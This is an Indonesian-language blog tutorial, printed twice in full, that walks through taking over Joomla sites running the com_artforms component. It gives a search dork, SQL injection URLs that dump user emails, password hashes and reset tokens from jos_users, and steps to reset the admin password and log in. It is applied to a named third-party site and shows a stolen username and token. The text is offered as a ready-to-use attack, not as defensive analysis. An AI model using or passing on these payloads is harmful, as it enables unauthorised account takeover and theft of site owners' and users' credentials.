Ok malam ini saya akan membagikan trik reset password dengan token,
Siap kan bahan-bahan,
- Kopi
- Kratingdeng
- Rokok
- Cemilan
- Dan sedikit otak untuk berfikir
Langsung saja
Dork >
inurl:"option com_artforms"
Exploit mencari Email >
index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,us
ername,0x3a,password)+from+jos_users--
Exploit reset >
index.php?option=com_user&view=reset
Exploit mencari token >
index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a
,activation)+from+jos_users
Saya disini mendapat target
http://www.vernonfrost-mu.com
Setelah itu kita exploit untuk mencari Email target sehingga menjadi
http://www.vernonfrost-mu.com/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,us
ername,0x3a,password)+from+jos_users--
Dan kita mendapat emailnya
Selanjutnya kita reset dengan memasukan exploit sehingga
http://www.vernonfrost-mu.com/index.php?option=com_user&view=reset
setelah muncul kotak emailnya kamu masukan emailnya dan klik submit
Selanjutnya kita mencari user name dan token,Kita masukan exploitnya sehingga menjadi
http://www.vernonfrost-mu.com/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a
,activation)+from+jos_users
Tuch,dah keliatan username sama tokenya
username : lsioq
Token : 5d02jkqwum7e5195e1be311b27f25404a2d55187ab
kita kembali lagi ke sini
http://www.vernonfrost-mu.com/index.php?option=com_user&view=reset
setelah memasukan email dan klik submit tadi maka tmpilanya begini
Setelah itu kalian masukan username dan passwordnya lalu klik submit bila vuln kamu langsung bisa mereset password dan kamu bisa login ke cpanelnya.
Sekian tutorial dari saya semoga bermanfaat.
created by : 1mp4ct_404
Exploit
Siap kan bahan-bahan,
- Kopi
- Kratingdeng
- Rokok
- Cemilan
- Dan sedikit otak untuk berfikir
Langsung saja
Dork >
inurl:"option com_artforms"
Exploit mencari Email >
index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,us
ername,0x3a,password)+from+jos_users--
Exploit reset >
index.php?option=com_user&view=reset
Exploit mencari token >
index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a
,activation)+from+jos_users
Saya disini mendapat target
http://www.vernonfrost-mu.com
Setelah itu kita exploit untuk mencari Email target sehingga menjadi
http://www.vernonfrost-mu.com/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,us
ername,0x3a,password)+from+jos_users--
Dan kita mendapat emailnya
Selanjutnya kita reset dengan memasukan exploit sehingga
http://www.vernonfrost-mu.com/index.php?option=com_user&view=reset
setelah muncul kotak emailnya kamu masukan emailnya dan klik submit
Selanjutnya kita mencari user name dan token,Kita masukan exploitnya sehingga menjadi
http://www.vernonfrost-mu.com/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a
,activation)+from+jos_users
Tuch,dah keliatan username sama tokenya
username : lsioq
Token : 5d02jkqwum7e5195e1be311b27f25404a2d55187ab
kita kembali lagi ke sini
http://www.vernonfrost-mu.com/index.php?option=com_user&view=reset
setelah memasukan email dan klik submit tadi maka tmpilanya begini
Setelah itu kalian masukan username dan passwordnya lalu klik submit bila vuln kamu langsung bisa mereset password dan kamu bisa login ke cpanelnya.
Sekian tutorial dari saya semoga bermanfaat.
created by : 1mp4ct_404
No comments:
Post a Comment